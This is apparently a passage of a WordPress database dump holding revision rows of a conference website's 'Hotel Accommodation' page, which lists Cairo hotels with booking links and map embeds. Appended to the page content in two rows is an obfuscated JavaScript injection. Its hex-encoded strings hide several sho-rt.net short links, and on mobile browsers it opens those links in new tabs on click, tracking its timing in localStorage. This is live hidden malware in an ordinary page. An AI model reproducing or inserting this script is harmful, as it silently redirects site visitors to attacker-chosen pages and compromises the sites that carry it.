_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:33:15','2023-07-18 22:33:15','',2685,'https://gsw2023.com/?p=5018',0,'revision','',0),
(5019,1,'2023-07-18 22:43:52','2023-07-18 22:43:52','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" reverse=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><a href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 10pt;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:43:52','2023-07-18 22:43:52','',2685,'https://gsw2023.com/?p=5019',0,'revision','',0),
(5020,1,'2023-07-18 22:45:17','2023-07-18 22:45:17','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" 